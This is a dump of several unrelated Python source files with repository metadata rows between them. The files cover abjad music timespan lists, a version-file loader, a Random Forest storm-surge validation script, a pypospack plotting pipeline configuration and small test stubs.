# [(164, 8), (166, 8), baritone_three_musicmaker_two],
# [(166, 8), (168, 8), baritone_three_musicmaker_two],
# [(168, 8), (170, 8), baritone_three_musicmaker_two],
# [(170, 8), (172, 8), baritone_three_musicmaker_two],
# [(172, 8), (174, 8), baritone_three_musicmaker_two],
# [(174, 8), (176, 8), baritone_three_musicmaker_three],
# [(176, 8), (178, 8), baritone_three_musicmaker_three],
# [(178, 8), (180, 8), baritone_three_musicmaker_three],
# [(180, 8), (182, 8), baritone_three_musicmaker_three],
# [(182, 8), (184, 8), baritone_three_musicmaker_three],
# [(184, 8), (186, 8), baritone_three_musicmaker_three],
# [(186, 8), (188, 8), baritone_three_musicmaker_two],
# [(188, 8), (190, 8), baritone_three_musicmaker_two],
# [(190, 8), (192, 8), baritone_three_musicmaker_two],
# [(192, 8), (194, 8), baritone_three_musicmaker_two],
# [(194, 8), (196, 8), baritone_three_musicmaker_two],
# [(196, 8), (198, 8), baritone_three_musicmaker_two],
# [(198, 8), (199, 8), baritone_three_musicmaker_two],
]
])
voice_19_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 19',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), bass_one_musicmaker_two],
[(2, 8), (4, 8), bass_one_musicmaker_two],
[(4, 8), (6, 8), bass_one_musicmaker_two],
[(6, 8), (8, 8), bass_one_musicmaker_three],
[(8, 8), (10, 8), bass_one_musicmaker_three],
[(10, 8), (12, 8), bass_one_musicmaker_two],
[(12, 8), (14, 8), bass_one_musicmaker_two],
[(14, 8), (16, 8), bass_one_musicmaker_two],
[(16, 8), (18, 8), bass_one_musicmaker_two],
[(18, 8), (20, 8), bass_one_musicmaker_three],
[(20, 8), (22, 8), bass_one_musicmaker_two],
[(22, 8), (24, 8), bass_one_musicmaker_two],
[(24, 8), (26, 8), bass_one_musicmaker_two],
[(26, 8), (28, 8), bass_one_musicmaker_two],
[(28, 8), (30, 8), bass_one_musicmaker_two],
[(30, 8), (32, 8), bass_one_musicmaker_three],
[(32, 8), (34, 8), bass_one_musicmaker_three],
[(34, 8), (36, 8), bass_one_musicmaker_three],
[(36, 8), (38, 8), bass_one_musicmaker_three],
[(38, 8), (40, 8), bass_one_musicmaker_three],
[(40, 8), (42, 8), bass_one_musicmaker_three],
[(42, 8), (44, 8), bass_one_musicmaker_three],
[(44, 8), (46, 8), bass_one_musicmaker_three],
[(46, 8), (48, 8), bass_one_musicmaker_two],
[(48, 8), (50, 8), bass_one_musicmaker_two],
[(50, 8), (52, 8), bass_one_musicmaker_two],
[(52, 8), (54, 8), bass_one_musicmaker_two],
[(54, 8), (56, 8), bass_one_musicmaker_two],
[(56, 8), (58, 8), bass_one_musicmaker_two],
[(58, 8), (60, 8), bass_one_musicmaker_three],
[(60, 8), (62, 8), bass_one_musicmaker_three],
[(62, 8), (64, 8), bass_one_musicmaker_three],
[(64, 8), (68, 8), bass_one_musicmaker_three],
[(68, 8), (70, 8), bass_one_musicmaker_three],
[(70, 8), (72, 8), bass_one_musicmaker_three],
[(72, 8), (74, 8), bass_one_musicmaker_three],
[(74, 8), (76, 8), bass_one_musicmaker_two],
[(76, 8), (78, 8), bass_one_musicmaker_two],
[(78, 8), (80, 8), bass_one_musicmaker_two],
[(80, 8), (82, 8), bass_one_musicmaker_two],
[(82, 8), (84, 8), bass_one_musicmaker_two],
[(84, 8), (86, 8), bass_one_musicmaker_two],
[(86, 8), (88, 8), bass_one_musicmaker_two],
[(88, 8), (90, 8), bass_one_musicmaker_three],
[(90, 8), (92, 8), bass_one_musicmaker_three],
[(92, 8), (94, 8), bass_one_musicmaker_three],
[(94, 8), (96, 8), bass_one_musicmaker_three],
[(96, 8), (98, 8), bass_one_musicmaker_three],
[(98, 8), (100, 8), bass_one_musicmaker_three],
[(100, 8), (102, 8), bass_one_musicmaker_two],
[(102, 8), (104, 8), bass_one_musicmaker_two],
# [(104, 8), (106, 8), bass_one_musicmaker_two],
# [(106, 8), (108, 8), bass_one_musicmaker_two],
# [(108, 8), (110, 8), bass_one_musicmaker_two],
# [(110, 8), (112, 8), bass_one_musicmaker_two],
# [(112, 8), (114, 8), bass_one_musicmaker_two],
# [(114, 8), (116, 8), bass_one_musicmaker_two],
# [(116, 8), (118, 8), bass_one_musicmaker_three],
# [(118, 8), (120, 8), bass_one_musicmaker_three],
# [(120, 8), (122, 8), bass_one_musicmaker_three],
# [(122, 8), (124, 8), bass_one_musicmaker_three],
# [(124, 8), (126, 8), bass_one_musicmaker_three],
# [(126, 8), (128, 8), bass_one_musicmaker_two],
# [(128, 8), (130, 8), bass_one_musicmaker_three],
# [(130, 8), (132, 8), bass_one_musicmaker_three],
# [(132, 8), (134, 8), bass_one_musicmaker_three],
# [(134, 8), (136, 8), bass_one_musicmaker_three],
# [(136, 8), (138, 8), bass_one_musicmaker_two],
# [(138, 8), (140, 8), bass_one_musicmaker_two],
# [(140, 8), (142, 8), bass_one_musicmaker_three],
# [(142, 8), (144, 8), bass_one_musicmaker_three],
# [(144, 8), (146, 8), bass_one_musicmaker_three],
# [(146, 8), (148, 8), bass_one_musicmaker_two],
# [(148, 8), (150, 8), bass_one_musicmaker_two],
# [(150, 8), (152, 8), bass_one_musicmaker_two],
# [(152, 8), (154, 8), bass_one_musicmaker_three],
# [(154, 8), (156, 8), bass_one_musicmaker_three],
# [(156, 8), (158, 8), bass_one_musicmaker_two],
# [(158, 8), (160, 8), bass_one_musicmaker_two],
# [(160, 8), (162, 8), bass_one_musicmaker_two],
# [(162, 8), (164, 8), bass_one_musicmaker_two],
# [(164, 8), (168, 8), bass_one_musicmaker_three],
# [(168, 8), (170, 8), bass_one_musicmaker_two],
# [(170, 8), (172, 8), bass_one_musicmaker_two],
# [(172, 8), (174, 8), bass_one_musicmaker_two],
# [(174, 8), (176, 8), bass_one_musicmaker_two],
# [(176, 8), (178, 8), bass_one_musicmaker_two],
# [(178, 8), (180, 8), bass_one_musicmaker_three],
# [(180, 8), (182, 8), bass_one_musicmaker_three],
# [(182, 8), (184, 8), bass_one_musicmaker_three],
# [(184, 8), (186, 8), bass_one_musicmaker_three],
# [(186, 8), (188, 8), bass_one_musicmaker_three],
# [(188, 8), (190, 8), bass_one_musicmaker_three],
# [(190, 8), (192, 8), bass_one_musicmaker_three],
# [(192, 8), (194, 8), bass_one_musicmaker_three],
# [(194, 8), (196, 8), bass_one_musicmaker_two],
# [(196, 8), (198, 8), bass_one_musicmaker_two],
# [(198, 8), (199, 8), bass_one_musicmaker_two],
]
])
voice_20_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 20',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), bass_two_musicmaker_two],
[(2, 8), (4, 8), bass_two_musicmaker_two],
[(4, 8), (6, 8), bass_two_musicmaker_two],
[(6, 8), (8, 8), bass_two_musicmaker_three],
[(8, 8), (10, 8), bass_two_musicmaker_three],
[(10, 8), (12, 8), bass_two_musicmaker_two],
[(12, 8), (14, 8), bass_two_musicmaker_two],
[(14, 8), (16, 8), bass_two_musicmaker_two],
[(16, 8), (18, 8), bass_two_musicmaker_two],
[(18, 8), (20, 8), bass_two_musicmaker_three],
[(20, 8), (22, 8), bass_two_musicmaker_two],
[(22, 8), (24, 8), bass_two_musicmaker_two],
[(24, 8), (26, 8), bass_two_musicmaker_two],
[(26, 8), (28, 8), bass_two_musicmaker_two],
[(28, 8), (30, 8), bass_two_musicmaker_two],
[(30, 8), (32, 8), bass_two_musicmaker_three],
[(32, 8), (34, 8), bass_two_musicmaker_three],
[(34, 8), (36, 8), bass_two_musicmaker_three],
[(36, 8), (38, 8), bass_two_musicmaker_three],
[(38, 8), (40, 8), bass_two_musicmaker_three],
[(40, 8), (42, 8), bass_two_musicmaker_three],
[(42, 8), (44, 8), bass_two_musicmaker_three],
[(44, 8), (46, 8), bass_two_musicmaker_three],
[(46, 8), (48, 8), bass_two_musicmaker_two],
[(48, 8), (50, 8), bass_two_musicmaker_two],
[(50, 8), (52, 8), bass_two_musicmaker_two],
[(52, 8), (54, 8), bass_two_musicmaker_two],
[(54, 8), (56, 8), bass_two_musicmaker_two],
[(56, 8), (58, 8), bass_two_musicmaker_two],
[(58, 8), (60, 8), bass_two_musicmaker_three],
[(60, 8), (62, 8), bass_two_musicmaker_three],
[(62, 8), (64, 8), bass_two_musicmaker_three],
[(64, 8), (68, 8), bass_two_musicmaker_three],
[(68, 8), (70, 8), bass_two_musicmaker_three],
[(70, 8), (72, 8), bass_two_musicmaker_three],
[(72, 8), (74, 8), bass_two_musicmaker_three],
[(74, 8), (76, 8), bass_two_musicmaker_two],
[(76, 8), (78, 8), bass_two_musicmaker_two],
[(78, 8), (80, 8), bass_two_musicmaker_two],
[(80, 8), (82, 8), bass_two_musicmaker_two],
[(82, 8), (84, 8), bass_two_musicmaker_two],
[(84, 8), (86, 8), bass_two_musicmaker_two],
[(86, 8), (88, 8), bass_two_musicmaker_two],
[(88, 8), (90, 8), bass_two_musicmaker_three],
[(90, 8), (92, 8), bass_two_musicmaker_three],
[(92, 8), (94, 8), bass_two_musicmaker_three],
[(94, 8), (96, 8), bass_two_musicmaker_three],
[(96, 8), (98, 8), bass_two_musicmaker_three],
[(98, 8), (100, 8), bass_two_musicmaker_three],
[(100, 8), (102, 8), bass_two_musicmaker_two],
[(102, 8), (104, 8), bass_two_musicmaker_two],
# [(104, 8), (106, 8), bass_two_musicmaker_two],
# [(106, 8), (108, 8), bass_two_musicmaker_two],
# [(108, 8), (110, 8), bass_two_musicmaker_two],
# [(110, 8), (112, 8), bass_two_musicmaker_two],
# [(112, 8), (114, 8), bass_two_musicmaker_two],
# [(114, 8), (116, 8), bass_two_musicmaker_two],
# [(116, 8), (118, 8), bass_two_musicmaker_three],
# [(118, 8), (120, 8), bass_two_musicmaker_three],
# [(120, 8), (122, 8), bass_two_musicmaker_three],
# [(122, 8), (124, 8), bass_two_musicmaker_three],
# [(124, 8), (126, 8), bass_two_musicmaker_three],
# [(126, 8), (128, 8), bass_two_musicmaker_two],
# [(128, 8), (130, 8), bass_two_musicmaker_three],
# [(130, 8), (132, 8), bass_two_musicmaker_three],
# [(132, 8), (134, 8), bass_two_musicmaker_three],
# [(134, 8), (136, 8), bass_two_musicmaker_three],
# [(136, 8), (138, 8), bass_two_musicmaker_two],
# [(138, 8), (140, 8), bass_two_musicmaker_two],
# [(140, 8), (142, 8), bass_two_musicmaker_three],
# [(142, 8), (144, 8), bass_two_musicmaker_three],
# [(144, 8), (146, 8), bass_two_musicmaker_three],
# [(146, 8), (148, 8), bass_two_musicmaker_two],
# [(148, 8), (150, 8), bass_two_musicmaker_two],
# [(150, 8), (152, 8), bass_two_musicmaker_two],
# [(152, 8), (154, 8), bass_two_musicmaker_three],
# [(154, 8), (156, 8), bass_two_musicmaker_three],
# [(156, 8), (158, 8), bass_two_musicmaker_two],
# [(158, 8), (160, 8), bass_two_musicmaker_two],
# [(160, 8), (162, 8), bass_two_musicmaker_two],
# [(162, 8), (164, 8), bass_two_musicmaker_two],
# [(164, 8), (168, 8), bass_two_musicmaker_three],
# [(168, 8), (170, 8), bass_two_musicmaker_two],
# [(170, 8), (172, 8), bass_two_musicmaker_two],
# [(172, 8), (174, 8), bass_two_musicmaker_two],
# [(174, 8), (176, 8), bass_two_musicmaker_two],
# [(176, 8), (178, 8), bass_two_musicmaker_two],
# [(178, 8), (180, 8), bass_two_musicmaker_three],
# [(180, 8), (182, 8), bass_two_musicmaker_three],
# [(182, 8), (184, 8), bass_two_musicmaker_three],
# [(184, 8), (186, 8), bass_two_musicmaker_three],
# [(186, 8), (188, 8), bass_two_musicmaker_three],
# [(188, 8), (190, 8), bass_two_musicmaker_three],
# [(190, 8), (192, 8), bass_two_musicmaker_three],
# [(192, 8), (194, 8), bass_two_musicmaker_three],
# [(194, 8), (196, 8), bass_two_musicmaker_two],
# [(196, 8), (198, 8), bass_two_musicmaker_two],
# [(198, 8), (199, 8), bass_two_musicmaker_two],
]
])
voice_21_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 21',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), contrabass_musicmaker_two],
[(2, 8), (4, 8), contrabass_musicmaker_two],
[(4, 8), (6, 8), contrabass_musicmaker_two],
[(6, 8), (8, 8), contrabass_musicmaker_three],
[(8, 8), (10, 8), contrabass_musicmaker_three],
[(10, 8), (12, 8), contrabass_musicmaker_two],
[(12, 8), (14, 8), contrabass_musicmaker_two],
[(14, 8), (16, 8), contrabass_musicmaker_two],
[(16, 8), (18, 8), contrabass_musicmaker_two],
[(18, 8), (20, 8), contrabass_musicmaker_three],
[(20, 8), (22, 8), contrabass_musicmaker_two],
[(22, 8), (24, 8), contrabass_musicmaker_two],
[(24, 8), (26, 8), contrabass_musicmaker_two],
[(26, 8), (28, 8), contrabass_musicmaker_two],
[(28, 8), (30, 8), contrabass_musicmaker_two],
[(30, 8), (32, 8), contrabass_musicmaker_three],
[(32, 8), (34, 8), contrabass_musicmaker_three],
[(34, 8), (36, 8), contrabass_musicmaker_three],
[(36, 8), (38, 8), contrabass_musicmaker_three],
[(38, 8), (40, 8), contrabass_musicmaker_three],
[(40, 8), (42, 8), contrabass_musicmaker_three],
[(42, 8), (44, 8), contrabass_musicmaker_three],
[(44, 8), (46, 8), contrabass_musicmaker_three],
[(46, 8), (48, 8), contrabass_musicmaker_two],
[(48, 8), (50, 8), contrabass_musicmaker_two],
[(50, 8), (52, 8), contrabass_musicmaker_two],
[(52, 8), (54, 8), contrabass_musicmaker_two],
[(54, 8), (56, 8), contrabass_musicmaker_two],
[(56, 8), (58, 8), contrabass_musicmaker_two],
[(58, 8), (60, 8), contrabass_musicmaker_three],
[(60, 8), (62, 8), contrabass_musicmaker_three],
[(62, 8), (64, 8), contrabass_musicmaker_three],
[(64, 8), (68, 8), contrabass_musicmaker_three],
[(68, 8), (70, 8), contrabass_musicmaker_three],
[(70, 8), (72, 8), contrabass_musicmaker_three],
[(72, 8), (74, 8), contrabass_musicmaker_three],
[(74, 8), (76, 8), contrabass_musicmaker_two],
[(76, 8), (78, 8), contrabass_musicmaker_two],
[(78, 8), (80, 8), contrabass_musicmaker_two],
[(80, 8), (82, 8), contrabass_musicmaker_two],
[(82, 8), (84, 8), contrabass_musicmaker_two],
[(84, 8), (86, 8), contrabass_musicmaker_two],
[(86, 8), (88, 8), contrabass_musicmaker_two],
[(88, 8), (90, 8), contrabass_musicmaker_three],
[(90, 8), (92, 8), contrabass_musicmaker_three],
[(92, 8), (94, 8), contrabass_musicmaker_three],
[(94, 8), (96, 8), contrabass_musicmaker_three],
[(96, 8), (98, 8), contrabass_musicmaker_three],
[(98, 8), (100, 8), contrabass_musicmaker_three],
[(100, 8), (102, 8), contrabass_musicmaker_two],
[(102, 8), (104, 8), contrabass_musicmaker_two],
# [(104, 8), (106, 8), contrabass_musicmaker_two],
# [(106, 8), (108, 8), contrabass_musicmaker_two],
# [(108, 8), (110, 8), contrabass_musicmaker_two],
# [(110, 8), (112, 8), contrabass_musicmaker_two],
# [(112, 8), (114, 8), contrabass_musicmaker_two],
# [(114, 8), (116, 8), contrabass_musicmaker_two],
# [(116, 8), (118, 8), contrabass_musicmaker_three],
# [(118, 8), (120, 8), contrabass_musicmaker_three],
# [(120, 8), (122, 8), contrabass_musicmaker_three],
# [(122, 8), (124, 8), contrabass_musicmaker_three],
# [(124, 8), (126, 8), contrabass_musicmaker_three],
# [(126, 8), (128, 8), contrabass_musicmaker_two],
# [(128, 8), (130, 8), contrabass_musicmaker_three],
# [(130, 8), (132, 8), contrabass_musicmaker_three],
# [(132, 8), (134, 8), contrabass_musicmaker_three],
# [(134, 8), (136, 8), contrabass_musicmaker_three],
# [(136, 8), (138, 8), contrabass_musicmaker_two],
# [(138, 8), (140, 8), contrabass_musicmaker_two],
# [(140, 8), (142, 8), contrabass_musicmaker_three],
# [(142, 8), (144, 8), contrabass_musicmaker_three],
# [(144, 8), (146, 8), contrabass_musicmaker_three],
# [(146, 8), (148, 8), contrabass_musicmaker_two],
# [(148, 8), (150, 8), contrabass_musicmaker_two],
# [(150, 8), (152, 8), contrabass_musicmaker_two],
# [(152, 8), (154, 8), contrabass_musicmaker_three],
# [(154, 8), (156, 8), contrabass_musicmaker_three],
# [(156, 8), (158, 8), contrabass_musicmaker_two],
# [(158, 8), (160, 8), contrabass_musicmaker_two],
# [(160, 8), (162, 8), contrabass_musicmaker_two],
# [(162, 8), (164, 8), contrabass_musicmaker_two],
# [(164, 8), (168, 8), contrabass_musicmaker_three],
# [(168, 8), (170, 8), contrabass_musicmaker_two],
# [(170, 8), (172, 8), contrabass_musicmaker_two],
# [(172, 8), (174, 8), contrabass_musicmaker_two],
# [(174, 8), (176, 8), contrabass_musicmaker_two],
# [(176, 8), (178, 8), contrabass_musicmaker_two],
# [(178, 8), (180, 8), contrabass_musicmaker_three],
# [(180, 8), (182, 8), contrabass_musicmaker_three],
# [(182, 8), (184, 8), contrabass_musicmaker_three],
# [(184, 8), (186, 8), contrabass_musicmaker_three],
# [(186, 8), (188, 8), contrabass_musicmaker_three],
# [(188, 8), (190, 8), contrabass_musicmaker_three],
# [(190, 8), (192, 8), contrabass_musicmaker_three],
# [(192, 8), (194, 8), contrabass_musicmaker_three],
# [(194, 8), (196, 8), contrabass_musicmaker_two],
# [(196, 8), (198, 8), contrabass_musicmaker_two],
# [(198, 8), (199, 8), contrabass_musicmaker_two],
]
])
# Create a dictionary mapping voice names to timespan lists so we can
# maintain the association in later operations:
all_timespans = [
voice_1_timespan_list,
voice_2_timespan_list,
voice_3_timespan_list,
voice_4_timespan_list,
voice_5_timespan_list,
voice_6_timespan_list,
voice_7_timespan_list,
voice_8_timespan_list,
voice_9_timespan_list,
voice_10_timespan_list,
voice_11_timespan_list,
voice_12_timespan_list,
voice_13_timespan_list,
voice_14_timespan_list,
voice_15_timespan_list,
voice_16_timespan_list,
voice_17_timespan_list,
voice_18_timespan_list,
voice_19_timespan_list,
voice_20_timespan_list,
voice_21_timespan_list,
]
all_timespan_lists = abjad.TimespanList([])
all_timespan_lists = make_showable_list(all_timespans)
abjad.show(all_timespan_lists,
key='annotation',
scale=2
)
| [
"gregoryrowlandevans@gmail.com"
] | gregoryrowlandevans@gmail.com |
2c40f53838408287189e489b19df5fc1ec20aa1a | 8b675ca56bae3a1b622eff991f8786963712d12f | /a301/__init__.py | e85022d2ce213a276ce0bce421a914b1172f3500 | [
"MIT"
] | permissive | KayhanB21/a301_code | b4dd7d8bdb2a4170211965abee707f48da4cbb23 | 4237b4e538bd999f5ac1b20f6b25b4c4e03bb09c | refs/heads/master | 2021-09-23T14:39:14.333193 | 2018-09-24T19:44:50 | 2018-09-24T19:44:50 | 150,385,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | from pathlib import Path
#
# open the VERSION file and read it into a301.__version__
# https://github.com/pypa/setuptools/issues/1316
#
__version_file__=Path(__file__).parent / Path('VERSION')
#
# if __version_file__ doesn't exist, try to create it and
# write 'no_version', if that doesn't work (no write permission), set
# __version_file__ to None
#
if not __version_file__.is_file():
__version__ = 'no_version'
try:
with open(__version_file__,'w') as f:
f.write(__version__)
except:
__version_file__=None
else:
with open(__version_file__) as f:
__version__=f.read().strip()
| [
"paustin@eos.ubc.ca"
] | paustin@eos.ubc.ca |
9545e13460cfa481d9ae30dc5b02b4f93977fc49 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merraRF882/61-tideGauge.py | e49c8cf3e8885cfd243aea28ac1f410de445d6df | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,454 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 61
y = 62
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
#filter only .csv files
tgNames = []
for file in glob.glob("*.csv"):
tgNames.append(file)
tg_name = sorted(tgNames)[tg]
print(tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
print("this tide gauge is already taken care of")
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
min_samples_leaf = 1)
rf.fit(X_train, y_train)
#predictions
predictions = rf.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
print()
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#run script
validateRF()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
0de82ef4d599b7fcb1e8c91a95fdb1238c215f5d | a5a4cee972e487512275c34f308251e6cc38c2fa | /examples/Ni__eam__born_exp_fs__postprocessing/Reduced_TSNE_qoi_in_param/configuration/configure_final_plot.py | bb505c0bb91236afab1d0c898c0312a5a119c4d8 | [
"MIT"
] | permissive | eragasa/pypospack | 4f54983b33dcd2dce5b602bc243ea8ef22fee86b | 21cdecaf3b05c87acc532d992be2c04d85bfbc22 | refs/heads/master | 2021-06-16T09:24:11.633693 | 2019-12-06T16:54:02 | 2019-12-06T16:54:02 | 99,282,824 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py | from collections import OrderedDict
from pypospack.pyposmat.data.pipeline import PyposmatPipeline
pipeline_configuration = OrderedDict()
# define first segment (plotting)
pipeline_configuration[0] = OrderedDict()
pipeline_configuration[0]['segment_type'] = 'plot'
pipeline_configuration[0]['function_calls'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['function'] = 'plot_by_cluster'
pipeline_configuration[0]['function_calls'][0]['args'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['args']['x_axis'] = 'tsne_0'
pipeline_configuration[0]['function_calls'][0]['args']['y_axis'] = 'tsne_1'
pipeline_configuration[0]['function_calls'][0]['args']['filename'] = 'qoi_clusters_in_param_tsne_space.png'
if __name__ == "__main__":
pipeline = PyposmatPipeline()
fn = __file__.replace('.py', '.in')
pipeline.write_configuration(filename=fn,
d=pipeline_configuration)
| [
"seatonullberg@gmail.com"
] | seatonullberg@gmail.com |
a25199bba01db10b42a11ff3f9af31b72b291e1c | ed538eba0bb81713d8353dea5baafd038913d52c | /photos/urls.py | af4fb96be4ef12b78a66dbe5fbb0f4a0609e76be | [] | no_license | Ansagan-Kabdolla/photo_site | 78cf738ff948cbf7d2207bff6166dcbe44679e1e | 19228dc3abeab9cc301962c970b15fcf040e2577 | refs/heads/master | 2022-06-04T20:06:07.798864 | 2020-05-02T20:05:28 | 2020-05-02T20:05:28 | 260,765,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | from django.urls import path
from .views import *
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('', index),
path('subservices/<int:pk>', subservice_example, name = 'subservices')
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"ansagankabdolla4@gmail.com"
] | ansagankabdolla4@gmail.com |
2abbbfc944cae908462b4e0cc04fb9174416e903 | 028274f08da4c616ccc1362df390dcfe58131fc6 | /DS_Management_Tools/run_ExcelHelper.py | 22b9388f9a6cc7741b030fca1b6a1d306b66c178 | [] | no_license | PyWilhelm/EDRIS_DS | 8a5430515bfc7e11abf846126f4fa2388ff59dd9 | cc0179495d8874ff5a95fd08d833388f434e1d87 | refs/heads/master | 2021-01-17T00:43:01.560668 | 2016-07-23T10:50:09 | 2016-07-23T10:50:09 | 64,011,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import ExcelHelper
ExcelHelper.run() | [
"ziyang.li.nk@gmail.com"
] | ziyang.li.nk@gmail.com |
5820dfd31c14197589ff85b20ee3c09ef20a8d93 | 434d5256fa47c6bec0e5d79917f2d09b52490fa0 | /tests/pypint/plugins_tests/implicit_solvers_tests/__init__.py | 540bd2c49fa5e3540bed00c4ec8613618cf57d42 | [] | no_license | Parallel-in-Time/PyPinT | 2d0a54d21a6b50863c6acef69eb9a86d3bcc7fcf | 90aed34cf43d633e44f56444f6c5d4fa39619663 | refs/heads/master | 2016-08-03T18:58:05.269042 | 2014-06-10T08:27:30 | 2014-06-10T08:32:45 | 19,447,961 | 0 | 2 | null | 2014-06-02T14:26:08 | 2014-05-05T07:39:20 | Python | UTF-8 | Python | false | false | 168 | py | # coding=utf-8
import unittest
class ImplicitSolversTests(unittest.TestSuite):
def __init__(self):
pass
if __name__ == "__main__":
unittest.main()
| [
"t.klatt@fz-juelich.de"
] | t.klatt@fz-juelich.de |
